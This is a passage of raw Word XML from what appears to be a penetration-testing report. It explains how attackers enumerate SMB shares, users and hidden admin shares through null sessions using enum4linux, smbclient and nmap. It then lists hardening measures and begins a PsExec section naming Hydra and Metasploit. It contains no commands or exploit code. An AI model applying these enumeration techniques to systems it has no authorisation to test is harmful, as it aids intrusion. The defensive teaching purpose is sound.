    <w:p w14:paraId="76680EDF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="220"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lDomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or workgroup information </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110F77B4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="195" w:line="371" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The default settings in the SMB protocol allow unauthenticated or lightly authenticated login attempts, common in older constructs such as the Windows Server 2008, in the interests of simplicity and compatibility; still, this function presents a potential weakness if not managed accurately. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FDD14" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">How Can a Hacker Exploit it? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738113F1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="265"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMB enumeration can be abused by an attacker by: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E6EFEC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="116" w:line="395" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using programs like enum4linux, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scripts to connect to port 445 on a target host. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F15CF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="187" w:line="392" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">If weak credentials are available or anonymous (null session) access is permitted, the attacker can: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B44A7AC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">List shared folders </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E16CE4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">List users, groups, and policies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B46F6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="127"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">List hidden admin shares like C$, ADMIN$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E26EE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="269"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Determine which permissions are misconfigured </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A850F3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="335"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacker benefits from this information: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293667F9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="394" w:lineRule="auto"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find possible file shares to steal information from. Obtain legitimate usernames for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F924D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="219"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a lateral movement map of the network structure. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC5B74" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAD55EB" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Real-World Example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5FDF9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows 2000, XP, and 2003 Anonymous SMB Enumeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD1EFD" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="333"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attackers frequently exploited null sessions in older Windows environments to list: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A881B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="128"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every user account on a domain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F94567E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="128"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shared printers and drives </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C6DBB7" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="219"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Group memberships </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE7E150" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="244" w:line="371" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Since no credentials were required, this method was frequently employed in penetration tests and actual breaches. As can be seen in the screenshot output (READ access to IPC$), misconfigured SMB permissions still permit anonymous access to IPC$, which could result in additional exploitation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB67C5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="70" w:line="493" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc23328"/>
      <w:r>
        <w:t xml:space="preserve">2.3.3 Corrective and Preventive Measures </w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2988C2C4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70" w:line="493" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3387"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Corrective Measures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA496A4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable Null Sessions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B340FB0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Review and Harden Shares Review </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A7B06" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="537" w:lineRule="auto"/>
        <w:ind w:right="147" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Apply Security Patches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Preventive Measures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E75D7" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable SMBv1 Protocol </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DB78B8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a Host – Based Firewall </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB30CD9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="219"/>
        <w:ind w:right="147" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce Authentication for SMB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300D126" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="113" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164835D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08103146" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703EFD88" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6711A8" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc23329"/>
    </w:p>
    <w:p w14:paraId="089003E4"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36D87478"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6F97AABF"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13980DD9"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0B382E30"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02DA9796"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76B78FCB"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551E7DF5"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73EF8C4F"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74C103D2"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7CF079E6"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6DBADCE0"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3CC2ACD7" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B86DE9F" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="0BB53843" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="1740178A" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="26C3952A" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="4468090B" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="5248AFC8" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="2DDBBFBF" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="5B27C29A" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRPr="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D"/>
    <w:p w14:paraId="3B912B1A" w14:textId="7A8AE010" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F5636D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9352" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="57" w:type="dxa"/>
          <w:left w:w="106" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="50" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2607"/>
        <w:gridCol w:w="6745"/>
      </w:tblGrid>
      <w:tr w:rsidR="0086222C" w14:paraId="4B717238" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B2F5AD6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="56" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Tool </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72BCAE23" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="62" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Used For </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086222C" w14:paraId="4BF83EC8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A37B1C6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="61" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nmap </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25ABD432" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nmap is used to search the network and display active services </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086222C" w14:paraId="3478A08B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D8D567A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="62" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hydra </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="023B354E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hydra used for forcing authentication services by brute-force </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086222C" w14:paraId="7C2F9066" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="838"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12B3B89D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="98" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Metasploit Framework </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6745" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13BE076D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Metasploit Framework used in the context of exploitation process and later access gained </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47C394E9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534923A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="208" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4731"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Justification: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA7DE8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D0805" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="35" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Used to find available ports and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>encyclopedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> information concerning the services they provide. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
